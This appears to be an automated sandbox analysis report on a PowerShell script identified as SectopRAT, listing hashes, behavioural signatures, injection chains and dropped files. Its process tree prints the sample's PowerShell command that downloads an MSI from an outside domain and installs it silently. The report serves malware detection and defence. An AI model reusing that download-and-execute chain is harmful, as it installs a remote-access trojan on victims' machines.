Analysis

max time kernel: 137s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02/04/2025, 22:44
Static task: static1
General

Target: code.ps1
Size: 128B
MD5: d8fb7b85741db93be10e3ed1363e32e7
SHA1: 2b464dce118e15d86c14a3e967acea2ac333f9c3
SHA256: 673e0d68fb4bf7faa06edab316d1fbc9cad8b10237cde5f3020b7feb45383048
SHA512: 9023651ed98a14a2b5c579f4a61270daa337548c93169963d65cf2d9d10f1e2560e8b32874fca357acabacd8554394f369c106b95cda4c3add539870da9638af
Malware Config
Signatures
SectopRAT payload 1 IoCs

| resource | yara_rule |
| --- | --- |
| behavioral1/memory/820-1448-0x0000000000400000-0x00000000004D4000-memory.dmp | family_sectoprat |

Sectoprat family
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 4760 created 3380 | 4760 | CasPol.exe | 55 |
Blocklisted process makes network request 2 IoCs

| flow | pid | Process |
| --- | --- | --- |
| 7 | 4168 | powershell.exe |
| 17 | 4168 | powershell.exe |
Executes dropped EXE 2 IoCs

| pid | Process |
| --- | --- |
| 2472 | vmnetdhcp.exe |
| 820 | CasPol.exe |
Loads dropped DLL 5 IoCs

| pid | Process |
| --- | --- |
| 2004 | MsiExec.exe |
| 2004 | MsiExec.exe |
| 2004 | MsiExec.exe |
| 2004 | MsiExec.exe |
| 4760 | CasPol.exe |
Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

| description | ioc | Process |
| --- | --- | --- |
| File opened (read-only) | \??\V: | msiexec.exe |
| File opened (read-only) | \??\Y: | msiexec.exe |
| File opened (read-only) | \??\G: | msiexec.exe |
| File opened (read-only) | \??\K: | msiexec.exe |
| File opened (read-only) | \??\R: | msiexec.exe |
| File opened (read-only) | \??\U: | msiexec.exe |
| File opened (read-only) | \??\X: | msiexec.exe |
| File opened (read-only) | \??\A: | msiexec.exe |
| File opened (read-only) | \??\N: | msiexec.exe |
| File opened (read-only) | \??\O: | msiexec.exe |
| File opened (read-only) | \??\Q: | msiexec.exe |
| File opened (read-only) | \??\T: | msiexec.exe |
| File opened (read-only) | \??\Z: | msiexec.exe |
| File opened (read-only) | \??\B: | msiexec.exe |
| File opened (read-only) | \??\E: | msiexec.exe |
| File opened (read-only) | \??\H: | msiexec.exe |
| File opened (read-only) | \??\J: | msiexec.exe |
| File opened (read-only) | \??\M: | msiexec.exe |
| File opened (read-only) | \??\P: | msiexec.exe |
| File opened (read-only) | \??\W: | msiexec.exe |
| File opened (read-only) | \??\I: | msiexec.exe |
| File opened (read-only) | \??\L: | msiexec.exe |
| File opened (read-only) | \??\S: | msiexec.exe |
Suspicious use of SetThreadContext 3 IoCs

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2472 set thread context of 4760 | 2472 | vmnetdhcp.exe | 109 |
| PID 2472 set thread context of 5068 | 2472 | vmnetdhcp.exe | 111 |
| PID 4760 set thread context of 820 | 4760 | CasPol.exe | 115 |
Drops file in Windows directory 12 IoCs

| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | C:\Windows\Installer\MSIE7F1.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSIE86F.tmp | msiexec.exe |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSIE999.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Installer\e57e35b.msi | msiexec.exe |
| File opened for modification | C:\Windows\Installer\ | msiexec.exe |
| File created | C:\Windows\Installer\SourceHash{05E46191-7BCB-4049-A621-B435063F3BBD} | msiexec.exe |
| File created | C:\Windows\Installer\e57e35f.msi | msiexec.exe |
| File created | C:\Windows\Installer\e57e35b.msi | msiexec.exe |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSIE55F.tmp | msiexec.exe |
| File opened for modification | C:\Windows\Installer\MSIE754.tmp | msiexec.exe |

Command and Scripting Interpreter: PowerShell

| pid | Process |
| --- | --- |
| 2872 | powershell.exe |
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | vmnetdhcp.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | gpupdate.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CasPol.exe |
Suspicious behavior: EnumeratesProcesses 19 IoCs

| pid | Process |
| --- | --- |
| 2872 | powershell.exe |
| 2872 | powershell.exe |
| 4168 | powershell.exe |
| 4168 | powershell.exe |
| 4288 | msiexec.exe |
| 4288 | msiexec.exe |
| 2472 | vmnetdhcp.exe |
| 2472 | vmnetdhcp.exe |
| 2472 | vmnetdhcp.exe |
| 2472 | vmnetdhcp.exe |
| 4760 | CasPol.exe |
| 4760 | CasPol.exe |
| 4760 | CasPol.exe |
| 4760 | CasPol.exe |
| 5068 | gpupdate.exe |
| 5068 | gpupdate.exe |
| 5068 | gpupdate.exe |
| 4760 | CasPol.exe |
| 4760 | CasPol.exe |
Suspicious behavior: MapViewOfSection 3 IoCs

| pid | Process |
| --- | --- |
| 2472 | vmnetdhcp.exe |
| 2472 | vmnetdhcp.exe |
| 2472 | vmnetdhcp.exe |
Suspicious use of AdjustPrivilegeToken 64 IoCs

| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 2872 | powershell.exe |
| Token: SeDebugPrivilege | 4168 | powershell.exe |
| Token: SeShutdownPrivilege | 1544 | msiexec.exe |
| Token: SeIncreaseQuotaPrivilege | 1544 | msiexec.exe |
| Token: SeSecurityPrivilege | 4288 | msiexec.exe |
| Token: SeCreateTokenPrivilege | 1544 | msiexec.exe |
| Token: SeAssignPrimaryTokenPrivilege | 1544 | msiexec.exe |
| Token: SeLockMemoryPrivilege | 1544 | msiexec.exe |
| Token: SeIncreaseQuotaPrivilege | 1544 | msiexec.exe |
| Token: SeMachineAccountPrivilege | 1544 | msiexec.exe |
| Token: SeTcbPrivilege | 1544 | msiexec.exe |
| Token: SeSecurityPrivilege | 1544 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 1544 | msiexec.exe |
| Token: SeLoadDriverPrivilege | 1544 | msiexec.exe |
| Token: SeSystemProfilePrivilege | 1544 | msiexec.exe |
| Token: SeSystemtimePrivilege | 1544 | msiexec.exe |
| Token: SeProfSingleProcessPrivilege | 1544 | msiexec.exe |
| Token: SeIncBasePriorityPrivilege | 1544 | msiexec.exe |
| Token: SeCreatePagefilePrivilege | 1544 | msiexec.exe |
| Token: SeCreatePermanentPrivilege | 1544 | msiexec.exe |
| Token: SeBackupPrivilege | 1544 | msiexec.exe |
| Token: SeRestorePrivilege | 1544 | msiexec.exe |
| Token: SeShutdownPrivilege | 1544 | msiexec.exe |
| Token: SeDebugPrivilege | 1544 | msiexec.exe |
| Token: SeAuditPrivilege | 1544 | msiexec.exe |
| Token: SeSystemEnvironmentPrivilege | 1544 | msiexec.exe |
| Token: SeChangeNotifyPrivilege | 1544 | msiexec.exe |
| Token: SeRemoteShutdownPrivilege | 1544 | msiexec.exe |
| Token: SeUndockPrivilege | 1544 | msiexec.exe |
| Token: SeSyncAgentPrivilege | 1544 | msiexec.exe |
| Token: SeEnableDelegationPrivilege | 1544 | msiexec.exe |
| Token: SeManageVolumePrivilege | 1544 | msiexec.exe |
| Token: SeImpersonatePrivilege | 1544 | msiexec.exe |
| Token: SeCreateGlobalPrivilege | 1544 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
| Token: SeRestorePrivilege | 4288 | msiexec.exe |
| Token: SeTakeOwnershipPrivilege | 4288 | msiexec.exe |
Suspicious use of WriteProcessMemory 27 IoCs

| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2872 wrote to memory of 4168 | 2872 | powershell.exe | 87 |
| PID 2872 wrote to memory of 4168 | 2872 | powershell.exe | 87 |
| PID 2872 wrote to memory of 1544 | 2872 | powershell.exe | 104 |
| PID 2872 wrote to memory of 1544 | 2872 | powershell.exe | 104 |
| PID 4288 wrote to memory of 2004 | 4288 | msiexec.exe | 107 |
| PID 4288 wrote to memory of 2004 | 4288 | msiexec.exe | 107 |
| PID 4288 wrote to memory of 2004 | 4288 | msiexec.exe | 107 |
| PID 4288 wrote to memory of 2472 | 4288 | msiexec.exe | 108 |
| PID 4288 wrote to memory of 2472 | 4288 | msiexec.exe | 108 |
| PID 4288 wrote to memory of 2472 | 4288 | msiexec.exe | 108 |
| PID 2472 wrote to memory of 4760 | 2472 | vmnetdhcp.exe | 109 |
| PID 2472 wrote to memory of 4760 | 2472 | vmnetdhcp.exe | 109 |
| PID 2472 wrote to memory of 4760 | 2472 | vmnetdhcp.exe | 109 |
| PID 2472 wrote to memory of 4760 | 2472 | vmnetdhcp.exe | 109 |
| PID 2472 wrote to memory of 4760 | 2472 | vmnetdhcp.exe | 109 |
| PID 2472 wrote to memory of 5068 | 2472 | vmnetdhcp.exe | 111 |
| PID 2472 wrote to memory of 5068 | 2472 | vmnetdhcp.exe | 111 |
| PID 2472 wrote to memory of 5068 | 2472 | vmnetdhcp.exe | 111 |
| PID 2472 wrote to memory of 5068 | 2472 | vmnetdhcp.exe | 111 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
| PID 4760 wrote to memory of 820 | 4760 | CasPol.exe | 115 |
Processes

- C:\Windows\Explorer.EXE (PID 3380)
  Command line: C:\Windows\Explorer.EXE
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2872)
    Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1
    Signatures:
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4168)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi
      Signatures:
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\msiexec.exe (PID 1544)
      Command line: "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe (PID 820)
    Command line: "C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"
    Signatures:
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
- C:\Windows\system32\msiexec.exe (PID 4288)
  Command line: C:\Windows\system32\msiexec.exe /V
  Signatures:
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\syswow64\MsiExec.exe (PID 2004)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 4298310646C57AF54FBEFD6915C7BB45
    Signatures:
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
  - C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe (PID 2472)
    Command line: "C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"
    Signatures:
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe (PID 4760)
      Command line: C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
      Signatures:
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\gpupdate.exe (PID 5068)
      Command line: C:\Windows\SysWOW64\gpupdate.exe
      Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 11KB
  MD5: 700b2d5cdfd705687e125a317f252c1c
  SHA1: 165bad01ac732314bdd8daf5d45ccfad0e294977
  SHA256: 0271df480b636d7128d44ea395b78de8b0ee2e7cd988a4d0a7b18b789c3ad959
  SHA512: dd777c5b2ee4344735c76dddea816e64a557abcf7f253ebe5c37a4032d2c58cf5baf8a446821af603e90618309a1011c8b70bcc8c64f988bb60006151a8f3fa7
- Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- Filesize: 64B
  MD5: 53b052154f5bf90cec9c30e8c8a2c4ae
  SHA1: ef4d136bf9e71e7db9d2442f45cfb2cd00a84ce8
  SHA256: 81b52e6f7aa4899827173ec107909ca5ccdd3e6e8d8190f15200115f3d097e91
  SHA512: 088dad2662cdaa1b120c8bbb25624748600f82b8ab849d9dd150d874af361f8e5b26a5e2615909e29a0941287f58b28fa9f23849a6eb9303655eb0ea14346cba
- Filesize: 99KB
  MD5: f61fa5ce25f885a9b1f549055c9911ed
  SHA1: aba1c035b06017b0b0bd1c712669646e4f3765ab
  SHA256: 57e9675902b443085e37ead57dfed97de6bb61321682bc93aff30f16b5ca5aeb
  SHA512: 02e3db343037294fd3b774f954c9a617a50715e6b89d7c409f3c7dc5a1cf5ed9418158c442e9e80111994da139a9a16db33ac68a833d6d115c4a41bdf75751ac
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 2.9MB
  MD5: 1c016531f2b109e3c8e06895188c3c79
  SHA1: 0f56fc7890cadb94a1029474912dab7b146a7376
  SHA256: 3e4dd65697cca5eae6361ea44145249a0978c945529d45015e4ede084977b99c
  SHA512: 87dba3edec8951052b21230ce69c1d948d93268c86ed3d7e579d2c3341b9d03803ba8d76b5079f74590f41196eb15efebfb8530a0a646419500eef0cce83cc42
- Filesize: 2.7MB
  MD5: 9837db7cfdbc32f096d365936246ae29
  SHA1: 81aa4851bcaaa0f56286360735651066ed4a8f60
  SHA256: 791f1854d6058b5b27ee393ed0a4828a2e04a1813da9c9ec2ab77ecb0980919f
  SHA512: dbf2220bf0c8b1ac894fd166c647f1e9cbe66af989e10cf47ae27670621ac92ef4449d520e911cc55f08c8d21f89e39d32e5ddcfe61013622a8721503cd603fa
- Filesize: 2.7MB
  MD5: 8b6418df4f08ab74044a83bfba52544f
  SHA1: 736ee2bc67fa64ba4b4c31cbe206300a30fb78c4
  SHA256: 8ed7f23a613a5f52cd987a95e5d8733d030cd5f5c91a5b59bc3f8a00738871a4
  SHA512: b3deee27771cd22fdbff6d89f60578e9bc07c6f8640d2016fe142408f9ea65ddac3b3aeb8145d8ccc9f2fd8ed4cf11e46ad6a21a2895ea4a18b9d4380bcd4a12
- Filesize: 5.0MB
  MD5: e58d905d9e1529e987c9a82a74ce29c9
  SHA1: b305eef82dc620e836ada7b56de9e98b077bf118
  SHA256: 87f7e5081a34770f1277d101c4ae40126623195cbce621196bde10e46df704b1
  SHA512: ff0d482d98676b1ffdfdb82ce7ba1327bde0d92deee583335ea5d93e7e8aa81aeae9b59753646fc4d12ee553e7254f654caffaee28d3756030912c7ce729ccfb
- Filesize: 386KB
  MD5: 72b1c6699ddc2baab105d32761285df2
  SHA1: fc85e9fb190f205e6752624a5231515c4ee4e155
  SHA256: bf7f6f7e527ab8617766bb7a21c21b2895b5275c0e808756c2aadcd66eff8a97
  SHA512: cde1e754d8dfb2fa55db243517b5dd3d75b209ea6387ef2e4be6157875e536db2373f23434a9e66c119150301c7b7cdf97de5a5544d94c03247b4ae716cbc170